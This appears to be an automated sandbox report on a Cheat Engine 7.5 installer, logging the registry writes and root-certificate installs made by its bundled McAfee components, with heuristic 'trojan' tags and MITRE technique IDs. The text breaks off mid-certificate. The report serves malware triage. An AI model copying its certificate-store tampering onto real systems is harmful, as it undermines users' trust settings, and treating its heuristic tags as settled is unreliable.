Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\shell\open\command\ = "\"C:\\Program Files\\Cheat Engine 7.5\\Cheat Engine.exe\" \"%1\""	CheatEngine75.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32\ = "C:\\Program Files\\McAfee\\WebAdvisor\\x64\\WSSDep.dll"	installer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32\ThreadingModel = "Apartment"	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}	installer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32\ThreadingModel = "Apartment"	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\shell	CheatEngine75.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\ = "McAfee SiteAdvisor MISP Integration"	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32	installer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32\ = "C:\\Program Files\\McAfee\\WebAdvisor\\win32\\WSSDep.dll"	installer.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	saBSI.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	saBSI.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	saBSI.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	saBSI.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a5